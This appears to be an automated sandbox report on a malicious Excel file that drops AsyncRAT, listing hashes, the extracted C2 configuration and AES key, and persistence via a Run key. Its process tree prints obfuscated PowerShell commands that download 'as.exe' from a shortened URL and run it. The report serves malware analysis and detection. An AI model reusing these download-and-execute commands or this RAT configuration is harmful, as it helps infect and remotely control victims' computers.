asyncrat | e3135524707805846676cd7c532842a58e3592d4feda5f162443175e32032ec5

General

Target

SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls
Size

75KB
MD5

3ee1d217550d9a55c163425be47b8011
SHA1

1bbfcfca3f3825519f9f788e22e44729b8076ead
SHA256

e3135524707805846676cd7c532842a58e3592d4feda5f162443175e32032ec5
SHA512

e3166273eac7e2bce19faabbb8b95e807fd66fa17e29adf3563df2fbbd55af68c2625021ba44070f81e7f600cd8537772457cdd6586c95f464ec011c9308a6b8

Score

10^/10

asyncrat persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cutt.ly/7gX8MWJ

Extracted

Family

asyncrat

Version

0.5.7B

C2

54.246.188.45:6606

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
V4QtIrUXBLtj5uq2coY1jhHCz0hmygkt
anti_detection
false
autorun
false
bdos
false
delay
Default
host
54.246.188.45
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6606
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2260	580	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3704	580	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1372	580	cmd.exe	EXCEL.EXE

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4336-34-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4336-35-0x000000000040C73E-mapping.dmp	asyncrat

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

34 3856 powershell.exe
37 3856 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

as.exe

pid process

4208 as.exe

flow	pid	process
34	3856	powershell.exe
37	3856	powershell.exe

pid	process
4208	as.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

as.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\vlc = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\VideoLAN\\vlc.exe\""	as.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

as.exe

description pid process target process

PID 4208 set thread context of 4336 4208 as.exe RegAsm.exe

description	pid	process	target process
PID 4208 set thread context of 4336	4208	as.exe	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

580 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
2276	powershell.exe
3856	powershell.exe
3864	powershell.exe
2276	powershell.exe
3856	powershell.exe
3864	powershell.exe
2276	powershell.exe
3856	powershell.exe
3864	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeas.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeDebugPrivilege	4208	as.exe
Token: SeDebugPrivilege	4336	RegAsm.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE
580	EXCEL.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.exepowershell.exeas.exe

description	pid	process	target process
PID 580 wrote to memory of 2260	580	EXCEL.EXE	cmd.exe
PID 580 wrote to memory of 2260	580	EXCEL.EXE	cmd.exe
PID 580 wrote to memory of 3704	580	EXCEL.EXE	cmd.exe
PID 580 wrote to memory of 3704	580	EXCEL.EXE	cmd.exe
PID 580 wrote to memory of 1372	580	EXCEL.EXE	cmd.exe
PID 580 wrote to memory of 1372	580	EXCEL.EXE	cmd.exe
PID 2260 wrote to memory of 3856	2260	cmd.exe	powershell.exe
PID 2260 wrote to memory of 3856	2260	cmd.exe	powershell.exe
PID 1372 wrote to memory of 3864	1372	cmd.exe	powershell.exe
PID 1372 wrote to memory of 3864	1372	cmd.exe	powershell.exe
PID 3704 wrote to memory of 2276	3704	cmd.exe	powershell.exe
PID 3704 wrote to memory of 2276	3704	cmd.exe	powershell.exe
PID 3864 wrote to memory of 4208	3864	powershell.exe	as.exe
PID 3864 wrote to memory of 4208	3864	powershell.exe	as.exe
PID 3864 wrote to memory of 4208	3864	powershell.exe	as.exe
PID 4208 wrote to memory of 4336	4208	as.exe	RegAsm.exe
PID 4208 wrote to memory of 4336	4208	as.exe	RegAsm.exe
PID 4208 wrote to memory of 4336	4208	as.exe	RegAsm.exe
PID 4208 wrote to memory of 4336	4208	as.exe	RegAsm.exe
PID 4208 wrote to memory of 4336	4208	as.exe	RegAsm.exe
PID 4208 wrote to memory of 4336	4208	as.exe	RegAsm.exe
PID 4208 wrote to memory of 4336	4208	as.exe	RegAsm.exe
PID 4208 wrote to memory of 4336	4208	as.exe	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\SYSTEM32\cmd.exe
cmd /cpowe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/7gX8MWJ'),'as.exe')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/7gX8MWJ'),'as.exe')
3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856

C:\Windows\SYSTEM32\cmd.exe
cmd /cpowe^rshell -w 1 stARt`-slE`Ep 20; Move-Item "as.exe" -Destination "${enV`:appdata}"
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 20; Move-Item "as.exe" -Destination "${enV`:appdata}"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\SYSTEM32\cmd.exe
cmd /cpowe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./as.exe
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./as.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3864

C:\Users\Admin\AppData\Roaming\as.exe
"C:\Users\Admin\AppData\Roaming\as.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
b346252fc3402a8f9552de980b4d5bf4

SHA1
e334a503dcf33f5ce0c80a282f1b73ad596d224b

SHA256
1cbdf33258112c4d294618126f4c920436e14a4f1879a00441388bc455556201

SHA512
069aa6baca7d77b5d5086922df095b86cef4abac6290d4e2709b6665968fd73b5b264bfc34f744a608ea0a8f54f7418a07d9f5fbc7b398c00e6ad6119e0d789e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d65056f14ead9bf74b1f977098c70ceb

SHA1
c86182f902daf95789571f4a069fc6be41537eac

SHA256
406a99286639930c10d3d701625fd1f2f639a670c15516029f5c335c1794abdc

SHA512
c41191b43a267d8ebf78c8d967d428a814425c5a9b44d91cc3452eb6dee41ee3b825c90f88536cbe496482535dcc179393edf5b1d52c2cf01d168ccae9da3c36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
706dac83683779ed367d1aace2cec51f

SHA1
4ccef33c399cdc8a60a4ee0c655e35ee3d69faa0

SHA256
d2367f9187f7c069d69e4f5a354af42ca5b88e3460071facd9cffd77482efb1f

SHA512
6cb70e608f8222b9b023197cb000008c195b03e1c9de1dd7f51274efa951152731758b7a629406e018ff9310b58526292ed92e9d3a0c08c56e0ce32499012bdb

Download Submit
C:\Users\Admin\AppData\Roaming\as.exe
MD5
7af23cd1d1ae577919bf3815d0500aec

SHA1
62c243e46381a14ea57e4f0e48b26c64506bb1be

SHA256
85c7135cf8f3c4d00a3c3a354d153e46aa5ba05574da00d8955a817a7bf8fbd4

SHA512
9758c5c1b080f9a3f77017c089d07f0b6f346d7a2c62e6721f2dfe4e7841e938e6fc442d5767824bc806ac06cb1a9b467b6a13797c7364bee7484dd30079bf59

Download Submit
C:\Users\Admin\Documents\as.exe
MD5
7af23cd1d1ae577919bf3815d0500aec

SHA1
62c243e46381a14ea57e4f0e48b26c64506bb1be

SHA256
85c7135cf8f3c4d00a3c3a354d153e46aa5ba05574da00d8955a817a7bf8fbd4

SHA512
9758c5c1b080f9a3f77017c089d07f0b6f346d7a2c62e6721f2dfe4e7841e938e6fc442d5767824bc806ac06cb1a9b467b6a13797c7364bee7484dd30079bf59

Download Submit
memory/580-0-0x00007FF91E6F0000-0x00007FF91ED27000-memory.dmp

Filesize
6.2MB

Download
memory/580-3-0x000001EB591C8000-0x000001EB591CF000-memory.dmp

Filesize
28KB

Download
memory/580-2-0x000001EB591C8000-0x000001EB591CF000-memory.dmp

Filesize
28KB

Download
memory/580-1-0x000001EB591C8000-0x000001EB591CF000-memory.dmp

Filesize
28KB

Download
memory/1372-6-0x0000000000000000-mapping.dmp

Download
memory/2260-4-0x0000000000000000-mapping.dmp

Download
memory/2276-9-0x0000000000000000-mapping.dmp

Download
memory/2276-12-0x00000180FA800000-0x00000180FB1EC000-memory.dmp

Filesize
9.9MB

Download
memory/2276-13-0x00000180FB4C0000-0x00000180FB4C1000-memory.dmp

Filesize
4KB

Download
memory/2276-16-0x00000180FB7A0000-0x00000180FB7A1000-memory.dmp

Filesize
4KB

Download
memory/3704-5-0x0000000000000000-mapping.dmp

Download
memory/3856-7-0x0000000000000000-mapping.dmp

Download
memory/3856-10-0x000001FA3BEB0000-0x000001FA3C89C000-memory.dmp

Filesize
9.9MB

Download
memory/3864-8-0x0000000000000000-mapping.dmp

Download
memory/3864-11-0x00000207B3430000-0x00000207B3E1C000-memory.dmp

Filesize
9.9MB

Download
memory/4208-30-0x0000000005370000-0x0000000005371000-memory.dmp

Filesize
4KB

Download
memory/4208-25-0x0000000073F80000-0x000000007466E000-memory.dmp

Filesize
6.9MB

Download
memory/4208-26-0x0000000000910000-0x0000000000911000-memory.dmp

Filesize
4KB

Download
memory/4208-28-0x0000000005900000-0x0000000005901000-memory.dmp

Filesize
4KB

Download
memory/4208-29-0x0000000005400000-0x0000000005401000-memory.dmp

Filesize
4KB

Download
memory/4208-22-0x0000000000000000-mapping.dmp

Download
memory/4208-31-0x0000000005880000-0x00000000058C2000-memory.dmp

Filesize
264KB

Download
memory/4208-32-0x00000000077D0000-0x00000000077D1000-memory.dmp

Filesize
4KB

Download
memory/4208-33-0x0000000007F40000-0x0000000007F56000-memory.dmp

Filesize
88KB

Download
memory/4336-34-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4336-35-0x000000000040C73E-mapping.dmp

Download
memory/4336-36-0x0000000073EC0000-0x00000000745AE000-memory.dmp

Filesize
6.9MB

Download
memory/4336-39-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads